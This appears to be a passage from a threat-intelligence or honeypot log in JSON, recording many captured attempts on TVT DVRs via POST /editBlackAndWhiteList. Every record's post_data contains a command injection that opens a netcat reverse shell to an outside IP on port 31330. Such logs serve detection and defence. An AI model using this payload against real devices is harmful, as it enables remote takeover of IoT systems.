- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T19:48:28Z",
- "last_seen": "2019-12-19T19:48:28Z"
- },
- {
- "source_ip_address": "151.31.8.203",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T19:47:13Z",
- "last_seen": "2019-12-19T19:47:13Z"
- },
- {
- "source_ip_address": "118.70.72.102",
- "country": "VN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T19:41:51Z",
- "last_seen": "2019-12-19T19:41:51Z"
- },
- {
- "source_ip_address": "72.27.220.115",
- "country": "JM",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T19:25:36Z",
- "last_seen": "2019-12-19T19:25:36Z"
- },
- {
- "source_ip_address": "82.79.56.56",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T18:15:58Z",
- "last_seen": "2019-12-19T18:15:58Z"
- },
- {
- "source_ip_address": "184.147.153.236",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 39,
- "first_seen": "2019-12-19T17:50:12Z",
- "last_seen": "2019-12-19T17:50:12Z"
- },
- {
- "source_ip_address": "84.43.207.55",
- "country": "BG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 42,
- "first_seen": "2019-12-19T17:13:37Z",
- "last_seen": "2019-12-19T17:13:37Z"
- },
- {
- "source_ip_address": "80.229.113.112",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T17:08:16Z",
- "last_seen": "2019-12-19T17:08:16Z"
- },
- {
- "source_ip_address": "98.119.140.65",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-18T23:25:39Z",
- "last_seen": "2019-12-19T16:49:08Z"
- },
- {
- "source_ip_address": "198.233.119.179",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T16:32:34Z",
- "last_seen": "2019-12-19T16:32:34Z"
- },
- {
- "source_ip_address": "213.163.116.127",
- "country": "AL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T16:28:10Z",
- "last_seen": "2019-12-19T16:28:10Z"
- },
- {
- "source_ip_address": "77.139.17.171",
- "country": "IL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T16:06:36Z",
- "last_seen": "2019-12-19T16:06:36Z"
- },
- {
- "source_ip_address": "108.35.228.124",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T15:58:56Z",
- "last_seen": "2019-12-19T15:58:56Z"
- },
- {
- "source_ip_address": "122.116.247.59",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T14:53:07Z",
- "last_seen": "2019-12-19T14:53:07Z"
- },
- {
- "source_ip_address": "184.3.0.34",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T14:45:13Z",
- "last_seen": "2019-12-19T14:45:13Z"
- },
- {
- "source_ip_address": "71.42.201.68",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T14:37:20Z",
- "last_seen": "2019-12-19T14:37:20Z"
- },
- {
- "source_ip_address": "187.159.31.41",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T14:33:37Z",
- "last_seen": "2019-12-19T14:33:37Z"
- },
- {
- "source_ip_address": "218.161.101.233",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T14:31:38Z",
- "last_seen": "2019-12-19T14:31:38Z"
- },
- {
- "source_ip_address": "70.168.196.120",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T14:29:41Z",
- "last_seen": "2019-12-19T14:29:41Z"
- },
- {
- "source_ip_address": "14.46.217.114",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T14:28:17Z",
- "last_seen": "2019-12-19T14:28:17Z"
- },
- {
- "source_ip_address": "79.119.197.210",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 60,
- "first_seen": "2019-12-19T14:15:51Z",
- "last_seen": "2019-12-19T14:15:51Z"
- },
- {
- "source_ip_address": "12.12.183.59",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T14:08:56Z",
- "last_seen": "2019-12-19T14:08:56Z"
- },
- {
- "source_ip_address": "108.46.78.101",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T13:55:08Z",
- "last_seen": "2019-12-19T13:55:08Z"
- },
- {
- "source_ip_address": "191.6.129.187",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 62,
- "first_seen": "2019-12-19T13:52:41Z",
- "last_seen": "2019-12-19T13:52:41Z"
- },
- {
- "source_ip_address": "81.168.94.171",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T13:40:07Z",
- "last_seen": "2019-12-19T13:40:07Z"
- },
- {
- "source_ip_address": "173.63.29.21",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T13:35:31Z",
- "last_seen": "2019-12-19T13:35:31Z"
- },
- {
- "source_ip_address": "80.82.70.211",
- "country": "SC",
- "user_agent": "ApiTool",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T12:55:37Z",
- "last_seen": "2019-12-19T13:31:14Z"
- },
- {
- "source_ip_address": "104.244.229.126",
- "country": "JM",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
